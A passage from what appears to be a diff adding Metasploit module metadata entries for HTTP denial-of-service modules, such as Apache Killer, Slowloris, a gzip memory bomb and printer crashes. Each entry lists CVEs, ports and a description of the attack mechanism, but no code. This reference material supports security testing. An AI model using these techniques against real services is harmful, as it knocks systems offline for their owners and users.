"/modules/auxiliary/dos/http/apache_mod_isapi.rb", + "is_install_path": true, + "ref_name": "dos/http/apache_mod_isapi", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/http/apache_range_dos": { + "name": "Apache Range Header DoS (Apache Killer)", + "fullname": "auxiliary/dos/http/apache_range_dos", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-08-19", + "type": "auxiliary", + "author": [ + "Kingcope", + "Masashi Fujiwara", + "Markus Neis " + ], + "description": "The byterange filter in the Apache HTTP Server 2.0.x through 2.0.64, and 2.2.x\n through 2.2.19 allows remote attackers to cause a denial of service (memory and\n CPU consumption) via a Range header that expresses multiple overlapping ranges,\n exploit called \"Apache Killer\"", + "references": [ + "BID-49303", + "CVE-2011-3192", + "EDB-17696", + "OSVDB-74721" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/http/apache_range_dos.rb", + "is_install_path": true, + "ref_name": "dos/http/apache_range_dos", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "CHECK", + "description": "Check if target is vulnerable" + }, + { + "name": "DOS", + "description": "Trigger Denial of Service against target" + } + ] + }, + "auxiliary_dos/http/apache_tomcat_transfer_encoding": { + "name": "Apache Tomcat Transfer-Encoding Information Disclosure and DoS", + "fullname": "auxiliary/dos/http/apache_tomcat_transfer_encoding", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-07-09", + "type": "auxiliary", + "author": [ + "Steve Jones", + "Hoagie ", + "Paulino Calderon " + ], + "description": "Apache Tomcat 5.5.0 through 5.5.29, 6.0.0 through 6.0.27, and 7.0.0 beta does not\n properly handle an invalid Transfer-Encoding header, which allows remote attackers\n to cause a denial of service (application outage) or obtain sensitive information\n via a crafted header that interferes with \"recycling of a buffer.\"", + "references": [ + "CVE-2010-2227", + "OSVDB-66319", + "BID-41544" + ], + "platform": "", + "arch": "", + "rport": 8000, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/http/apache_tomcat_transfer_encoding.rb", + "is_install_path": true, + "ref_name": "dos/http/apache_tomcat_transfer_encoding", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/http/brother_debut_dos": { + "name": "Brother Debut http Denial Of Service", + "fullname": "auxiliary/dos/http/brother_debut_dos", + "aliases": [], + "rank": 300, + "disclosure_date": "2017-11-02", + "type": "auxiliary", + "author": [ + "z00n <0xz00n@gmail.com>", + "h00die" + ], + "description": "The Debut embedded HTTP server <= 1.20 on Brother printers allows for a Denial\n of Service (DoS) condition via a crafted HTTP request. The printer will be\n unresponsive from HTTP and printing requests for ~300 seconds. After which, the\n printer will start responding again.", + "references": [ + "CVE-2017-16249", + "URL-https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18730" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/auxiliary/dos/http/brother_debut_dos.rb", + "is_install_path": true, + "ref_name": "dos/http/brother_debut_dos", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/http/cable_haunt_websocket_dos": { + "name": "\"Cablehaunt\" Cable Modem WebSocket DoS", + "fullname": "auxiliary/dos/http/cable_haunt_websocket_dos", + "aliases": [], + "rank": 300, + "disclosure_date": "2020-01-07", + "type": "auxiliary", + "author": [ + "Alexander Dalsgaard Krog (Lyrebirds)", + "Jens Hegner Stærmose (Lyrebirds)", + "Kasper Kohsel Terndrup (Lyrebirds)", + "Simon Vandel Sillesen (Independent)", + "Nicholas Starke" + ], + "description": "There exists a buffer overflow vulnerability in certain\n Cable Modem Spectrum Analyzer interfaces. This overflow\n is exploitable, but since an exploit would differ between\n every make, model, and firmware version (which also\n differs from ISP to ISP), this module simply causes a\n Denial of Service to test if the vulnerability is present.", + "references": [ + "CVE-2019-19494", + "EDB-47936", + "URL-https://cablehaunt.com/", + "URL-https://github.com/Lyrebirds/sagemcom-fast-3890-exploit" + ], + "platform": "", + "arch": "", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-03 18:12:53 +0000", + "path": "/modules/auxiliary/dos/http/cable_haunt_websocket_dos.rb", + "is_install_path": true, + "ref_name": "dos/http/cable_haunt_websocket_dos", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-service-down" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/http/canon_wireless_printer": { + "name": "Canon Wireless Printer Denial Of Service", + "fullname": "auxiliary/dos/http/canon_wireless_printer", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-06-18", + "type": "auxiliary", + "author": [ + "Matt \"hostess\" Andreko " + ], + "description": "The HTTP management interface on several models of Canon Wireless printers\n allows for a Denial of Service (DoS) condition via a crafted HTTP request. Note:\n if this module is successful, the device can only be recovered with a physical\n power cycle.", + "references": [ + "CVE-2013-4615", + "URL-https://www.mattandreko.com/2013/06/canon-y-u-no-security.html" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/auxiliary/dos/http/canon_wireless_printer.rb", + "is_install_path": true, + "ref_name": "dos/http/canon_wireless_printer", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/http/dell_openmanage_post": { + "name": "Dell OpenManage POST Request Heap Overflow (win32)", + "fullname": "auxiliary/dos/http/dell_openmanage_post", + "aliases": [], + "rank": 300, + "disclosure_date": "2004-02-26", + "type": "auxiliary", + "author": [ + "aushack " + ], + "description": "This module exploits a heap overflow in the Dell OpenManage\n Web Server (omws32.exe), versions 3.2-3.7.1. The vulnerability\n exists due to a boundary error within the handling of POST requests,\n where the application input is set to an overly long file name.\n This module will crash the web server, however it is likely exploitable\n under certain conditions.", + "references": [ + "URL-http://archives.neohapsis.com/archives/bugtraq/2004-02/0650.html", + "BID-9750", + "OSVDB-4077", + "CVE-2004-0331" + ], + "platform": "", + "arch": "", + "rport": 1311, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/http/dell_openmanage_post.rb", + "is_install_path": true, + "ref_name": "dos/http/dell_openmanage_post", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/http/f5_bigip_apm_max_sessions": { + "name": "F5 BigIP Access Policy Manager Session Exhaustion Denial of Service", + "fullname": "auxiliary/dos/http/f5_bigip_apm_max_sessions", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Denis Kolegov ", + "Oleg Broslavsky ", + "Nikita Oleksov " + ], + "description": "This module exploits a resource exhaustion denial of service in F5 BigIP devices. An\n unauthenticated attacker can establish multiple connections with BigIP Access Policy\n Manager (APM) and exhaust all available sessions defined in customer license. In the\n first step of the BigIP APM negotiation the client sends a HTTP request. The BigIP\n system creates a session, marks it as pending and then redirects the client to an access\n policy URI. Since BigIP allocates a new session after the first unauthenticated request,\n and deletes the session only if an access policy timeout expires, the attacker can exhaust\n all available sessions by repeatedly sending the initial HTTP request and leaving the\n sessions as pending.", + "references": [ + "URL-https://support.f5.com/kb/en-us/products/big-ip_apm/releasenotes/product/relnote-apm-11-6-0.html" + ], + "platform": "", + "arch": "", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/auxiliary/dos/http/f5_bigip_apm_max_sessions.rb", + "is_install_path": true, + "ref_name": "dos/http/f5_bigip_apm_max_sessions", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/http/flexense_http_server_dos": { + "name": "Flexense HTTP Server Denial Of Service", + "fullname": "auxiliary/dos/http/flexense_http_server_dos", + "aliases": [], + "rank": 300, + "disclosure_date": "2018-03-09", + "type": "auxiliary", + "author": [ + "Ege Balci " + ], + "description": "This module triggers a Denial of Service vulnerability in the Flexense HTTP server.\n Vulnerability caused by a user mode write access memory violation and can be triggered with\n rapidly sending variety of HTTP requests with long HTTP header values.\n\n Multiple Flexense applications that are using Flexense HTTP server 10.6.24 and below versions reportedly vulnerable.", + "references": [ + "CVE-2018-8065", + "URL-https://github.com/EgeBalci/Sync_Breeze_Enterprise_10_6_24_-DOS" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/dos/http/flexense_http_server_dos.rb", + "is_install_path": true, + "ref_name": "dos/http/flexense_http_server_dos", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/http/gzip_bomb_dos": { + "name": "Gzip Memory Bomb Denial Of Service", + "fullname": "auxiliary/dos/http/gzip_bomb_dos", + "aliases": [], + "rank": 300, + "disclosure_date": "2004-01-01", + "type": "auxiliary", + "author": [ + "info ", + "joev " + ], + "description": "This module generates and hosts a 10MB single-round gzip file that decompresses to 10GB.\n Many applications will not implement a length limit check and will eat up all memory and\n eventually die. This can also be used to kill systems that download/parse content from\n a user-provided URL (image-processing servers, AV, websites that accept zipped POST data, etc).\n\n A FILEPATH datastore option can also be provided to save the .gz bomb locally.\n\n Some clients (Firefox) will allow for multiple rounds of gzip. Most gzip utils will correctly\n deflate multiple rounds of gzip on a file. Setting ROUNDS=3 and SIZE=10240 (default value)\n will generate a 300 byte gzipped file that expands to 10GB.", + "references": [ + "URL-http://www.aerasec.de/security/advisories/decompression-bomb-vulnerability.html" + ], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/http/gzip_bomb_dos.rb", + "is_install_path": true, + "ref_name": "dos/http/gzip_bomb_dos", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "WebServer", + "description": "Host file via web server" + } + ] + }, + "auxiliary_dos/http/hashcollision_dos": { + "name": "Hashtable Collisions", + "fullname": "auxiliary/dos/http/hashcollision_dos", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-12-28", + "type": "auxiliary", + "author": [ + "Alexander Klink", + "Julian Waelde", + "Scott A. Crosby", + "Dan S. Wallach", + "Krzysztof Kotowicz", + "Christian Mehlmauer " + ], + "description": "This module uses a denial-of-service (DoS) condition appearing in a variety of\n programming languages. This vulnerability occurs when storing multiple values\n in a hash table and all values have the same hash value. This can cause a web server\n parsing the POST parameters issued with a request into a hash table to consume\n hours of CPU with a single HTTP request.\n\n Currently, only the hash functions for PHP and Java are implemented.\n This module was tested with PHP + httpd, Tomcat, Glassfish and Geronimo.\n It also generates a random payload to bypass some IDS signatures.", + "references": [ + "URL-http://ocert.org/advisories/ocert-2011-003.html", + "URL-https://web.archive.org/web/20120105151644/http://www.nruns.com/_downloads/advisory28122011.pdf", + "URL-https://fahrplan.events.ccc.de/congress/2011/Fahrplan/events/4680.en.html", + "URL-https://fahrplan.events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf", + "URL-https://www.youtube.com/watch?v=R2Cq3CLI6H8", + "CVE-2011-5034", + "CVE-2011-5035", + "CVE-2011-4885", + "CVE-2011-4858" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/auxiliary/dos/http/hashcollision_dos.rb", + "is_install_path": true, + "ref_name": "dos/http/hashcollision_dos", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/http/ibm_lotus_notes": { + "name": "IBM Notes encodeURI DOS", + "fullname": "auxiliary/dos/http/ibm_lotus_notes", + "aliases": [], + "rank": 300, + "disclosure_date": "2017-08-31", + "type": "auxiliary", + "author": [ + "Dhiraj Mishra" + ], + "description": "This module exploits a vulnerability in the native browser that comes with IBM Lotus Notes.\n If successful, it could cause the Notes client to hang and have to be restarted.", + "references": [ + "EDB-42602", + "CVE-2017-1129", + "URL-http://www-01.ibm.com/support/docview.wss?uid=swg21999385" + ], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2023-03-22 12:52:15 +0000", + "path": "/modules/auxiliary/dos/http/ibm_lotus_notes.rb", + "is_install_path": true, + "ref_name": "dos/http/ibm_lotus_notes", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "WebServer", + "description": "Serve exploit via web server" + } + ] + }, + "auxiliary_dos/http/ibm_lotus_notes2": { + "name": "IBM Notes Denial Of Service", + "fullname": "auxiliary/dos/http/ibm_lotus_notes2", + "aliases": [], + "rank": 300, + "disclosure_date": "2017-08-31", + "type": "auxiliary", + "author": [ + "Dhiraj Mishra" + ], + "description": "This module exploits a vulnerability in the native browser that comes with IBM Lotus Notes.\n If successful, the browser will crash after viewing the webpage.", + "references": [ + "EDB-42604", + "CVE-2017-1130" + ], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/http/ibm_lotus_notes2.rb", + "is_install_path": true, + "ref_name": "dos/http/ibm_lotus_notes2", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "WebServer", + "description": "Serve exploit via web server" + } + ] + }, + "auxiliary_dos/http/marked_redos": { + "name": "marked npm module \"heading\" ReDoS", + "fullname": "auxiliary/dos/http/marked_redos", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Adam Cazzolla, Sonatype Security Research", + "Nick Starke, Sonatype Security Research" + ], + "description": "This module exploits a Regular Expression Denial of Service vulnerability\n in the npm module \"marked\". The vulnerable portion of code that this module\n targets is in the \"heading\" regular expression. Web applications that use\n \"marked\" for generating html from markdown are vulnerable. Versions up to\n 0.4.0 are vulnerable.", + "references": [ + "URL-https://blog.sonatype.com/cve-2017-17461-vulnerable-or-not", + "CWE-400" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2018-08-16 14:59:32 +0000", + "path": "/modules/auxiliary/dos/http/marked_redos.rb", + "is_install_path": true, + "ref_name": "dos/http/marked_redos", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/http/metasploit_httphandler_dos": { + "name": "Metasploit HTTP(S) handler DoS", + "fullname": "auxiliary/dos/http/metasploit_httphandler_dos", + "aliases": [], + "rank": 300, + "disclosure_date": "2019-09-04", + "type": "auxiliary", + "author": [ + "Jose Garduno, Dreamlab Technologies AG", + "Angelo Seiler, Dreamlab Technologies AG" + ], + "description": "This module exploits the Metasploit HTTP(S) handler by sending\n a specially crafted HTTP request that gets added as a resource handler.\n Resources (which come from the external connections) are evaluated as RegEx\n in the handler server. Specially crafted input can trigger Gentle, Soft and Hard DoS.\n\n Tested against Metasploit 5.0.20.", + "references": [ + "CVE-2019-5645" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2019-12-26 13:31:38 +0000", + "path": "/modules/auxiliary/dos/http/metasploit_httphandler_dos.rb", + "is_install_path": true, + "ref_name": "dos/http/metasploit_httphandler_dos", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/http/monkey_headers": { + "name": "Monkey HTTPD Header Parsing Denial of Service (DoS)", + "fullname": "auxiliary/dos/http/monkey_headers", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-05-30", + "type": "auxiliary", + "author": [ + "Doug Prostko " + ], + "description": "This module causes improper header parsing that leads to a segmentation fault\n due to a specially crafted HTTP request. Affects version <= 1.2.0.", + "references": [ + "CVE-2013-3843", + "OSVDB-93853", + "BID-60333" + ], + "platform": "", + "arch": "", + "rport": 2001, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/http/monkey_headers.rb", + "is_install_path": true, + "ref_name": "dos/http/monkey_headers", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/http/ms15_034_ulonglongadd": { + "name": "MS15-034 HTTP Protocol Stack Request Handling Denial-of-Service", + "fullname": "auxiliary/dos/http/ms15_034_ulonglongadd", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Bill Finlayson", + "sinn3r " + ], + "description": "This module will check if scanned hosts are vulnerable to CVE-2015-1635 (MS15-034), a\n vulnerability in the HTTP protocol stack (HTTP.sys) that could result in arbitrary code\n execution. This module will try to cause a denial-of-service.", + "references": [ + "CVE-2015-1635", + "MSB-MS15-034", + "URL-https://pastebin.com/ypURDPc4", + "URL-https://github.com/rapid7/metasploit-framework/pull/5150", + "URL-https://community.qualys.com/blogs/securitylabs/2015/04/20/ms15-034-analyze-and-remote-detection", + "URL-http://www.securitysift.com/an-analysis-of-ms15-034/" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb", + "is_install_path": true, + "ref_name": "dos/http/ms15_034_ulonglongadd", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/http/nodejs_pipelining": { + "name": "Node.js HTTP Pipelining Denial of Service", + "fullname": "auxiliary/dos/http/nodejs_pipelining", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-10-18", + "type": "auxiliary", + "author": [ + "Marek Majkowski", + "titanous", + "joev " + ], + "description": "This module exploits a Denial of Service (DoS) condition in the HTTP parser of Node.js versions\n released before 0.10.21 and 0.8.26. The attack sends many pipelined\n HTTP requests on a single connection, which causes unbounded memory\n allocation when the client does not read the responses.", + "references": [ + "CVE-2013-4450", + "OSVDB-98724", + "BID-63229", + "URL-https://nodejs.org/ja/blog/vulnerability/http-server-pipeline-flood-dos/" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/auxiliary/dos/http/nodejs_pipelining.rb", + "is_install_path": true, + "ref_name": "dos/http/nodejs_pipelining", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/http/novell_file_reporter_heap_bof": { + "name": "NFR Agent Heap Overflow Vulnerability", + "fullname": "auxiliary/dos/http/novell_file_reporter_heap_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-11-16", + "type": "auxiliary", + "author": [ + "juan vazquez " + ], + "description": "This module exploits a heap overflow in NFRAgent.exe, a component of Novell\n File Reporter (NFR). The vulnerability occurs when handling requests of name \"SRS\",\n where NFRAgent.exe fails to generate a response in a secure way, copying user\n controlled data into a fixed-length buffer in the heap without bounds checking.\n This module has been tested against NFR Agent 1.0.4.3 (File Reporter 1.0.2).", + "references": [ + "CVE-2012-4956", + "URL-https://www.rapid7.com/blog/post/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959/" + ], + "platform": "", + "arch": "", + "rport": 3037, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/auxiliary/dos/http/novell_file_reporter_heap_bof.rb", + "is_install_path": true, + "ref_name": "dos/http/novell_file_reporter_heap_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/http/rails_action_view": { + "name": "Ruby on Rails Action View MIME Memory Exhaustion", + "fullname": "auxiliary/dos/http/rails_action_view", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-12-04", + "type": "auxiliary", + "author": [ + "Toby Hsieh", + "joev ", + "sinn3r " + ], + "description": "This module exploits a Denial of Service (DoS) condition in Action View that requires\n a controller action. By sending a specially crafted content-type header to a Rails\n application, it is possible for it to store the invalid MIME type, and may eventually\n consume all memory if enough invalid MIMEs are given.\n\n Versions 3.0.0 and other later versions are affected, fixed in 4.0.2 and 3.2.16.", + "references": [ + "CVE-2013-6414", + "OSVDB-100525", + "BID-64074", + "URL-https://seclists.org/oss-sec/2013/q4/400", + "URL-https://github.com/rails/rails/commit/bee3b7f9371d1e2ddcfe6eaff5dcb26c0a248068" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/http/rails_action_view.rb", + "is_install_path": true, + "ref_name": "dos/http/rails_action_view", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/http/rails_json_float_dos": { + "name": "Ruby on Rails JSON Processor Floating Point Heap Overflow DoS", + "fullname": "auxiliary/dos/http/rails_json_float_dos", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-11-22", + "type": "auxiliary", + "author": [ + "Charlie Somerville", + "joev ", + "todb " + ], + "description": "When Ruby attempts to convert a string representation of a large floating point\n decimal number to its floating point equivalent, a heap-based buffer overflow\n can be triggered. This module has been tested successfully on a Ruby on Rails application\n using Ruby version 1.9.3-p448 with WebRick and Thin web servers, where the Rails application\n crashes with a segfault error. Other versions of Ruby are reported to be affected.", + "references": [ + "CVE-2013-4164", + "OSVDB-100113", + "URL-https://www.ruby-lang.org/en/news/2013/11/22/ruby-1-9-3-p484-is-released/" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/http/rails_json_float_dos.rb", + "is_install_path": true, + "ref_name": "dos/http/rails_json_float_dos", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/http/slowloris": { + "name": "Slowloris Denial of Service Attack", + "fullname": "auxiliary/dos/http/slowloris", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-06-17", + "type": "auxiliary", + "author": [ + "RSnake", + "Gokberk Yaltirakli", + "Daniel Teixeira", + "Matthew Kienow " + ], + "description": "Slowloris tries to keep many connections to the target web server open and hold them open as long as possible.\n It accomplishes this by opening connections to the target web server and sending a partial request.\n Periodically, it will send subsequent HTTP headers, adding to-but never completing-the request.\n Affected servers will keep these connections open, filling their maximum concurrent connection pool,\n eventually denying additional connection attempts from clients.", + "references": [ + "CVE-2007-6750", + "CVE-2010-2227", + "EDB-8976", + "URL-https://github.com/gkbrk/slowloris" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2022-01-29 00:51:56 +0000", + "path": "/modules/auxiliary/dos/http/slowloris.py", + "is_install_path": true, + "ref_name": "dos/http/slowloris", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/http/sonicwall_ssl_format": { + "name": "SonicWALL SSL-VPN Format String Vulnerability", + "fullname": "auxiliary/dos/http/sonicwall_ssl_format", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-05-29", + "type": "auxiliary", + "author": [ + "aushack " + ], + "description": "There is a format string vulnerability within the SonicWALL\n SSL-VPN Appliance - 200, 2000 and 4000 series. Arbitrary memory\n can be read or written to, depending on the format string used.\n There appears to be a length limit of 127 characters of format\n string data. With physical access to the device and debugging,\n this module may be able to be used to execute arbitrary code remotely.", + "references": [ + "BID-35145", + "OSVDB-54881", + "URL-http://www.aushack.com/200905-sonicwall.txt" + ], + "platform": "", + "arch": "", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/http/sonicwall_ssl_format.rb", + "is_install_path": true, + "ref_name": "dos/http/sonicwall_ssl_format", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/http/squid_range_dos": { + "name": "Squid Proxy Range Header DoS", + "fullname": "auxiliary/dos/http/squid_range_dos", + "aliases": [], + "rank": 300, + "disclosure_date": "2021-05-27", + "type": "auxiliary", + "author": [ + "Joshua Rogers" + ], + "description": "The range handler in The Squid Caching Proxy Server 3.0-4.1.4 and\n 5.0.1-5.0.5 suffers from multiple vulnerabilities triggered\n by specific HTTP requests and responses.\n\n These vulnerabilities allow remote attackers to cause a\n denial of service through specifically crafted requests.", + "references": [ + "CVE-2021-31806", + "CVE-2021-31807", + "URL-https://blogs.opera.com/security/2021/10/fuzzing-http-proxies-squid-part-2/" + ], + "platform": "", + "arch": "", + "rport": 3128, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2021-10-21 19:15:30 +0000", + "path": "/modules/auxiliary/dos/http/squid_range_dos.rb", + "is_install_path": true, + "ref_name": "dos/http/squid_range_dos", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-service-down" + ], + "Reliability": [], + "SideEffects": [ + "ioc-in-logs" + ] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "DOS", + "description": "Perform Denial of Service Against The Target" + } + ] + }, + "auxiliary_dos/http/tautulli_shutdown_exec": { + "name": "Tautulli v2.1.9 - Shutdown Denial of Service", + "fullname": "auxiliary/dos/http/tautulli_shutdown_exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Ismail Tasdelen" + ], + "description": "Tautulli versions 2.1.9 and prior are vulnerable to denial of service via the /shutdown URL.", + "references": [ + "CVE-2019-19833", + "EDB-47785" + ], + "platform": "", + "arch": "", + "rport": 8181, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2021-08-27 17:15:33 +0000", + "path": "/modules/auxiliary/dos/http/tautulli_shutdown_exec.rb", + "is_install_path": true, + "ref_name": "dos/http/tautulli_shutdown_exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/http/ua_parser_js_redos": { + "name": "ua-parser-js npm module ReDoS", + "fullname": "auxiliary/dos/http/ua_parser_js_redos", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Ryan Knell, Sonatype Security Research", + "Nick Starke, 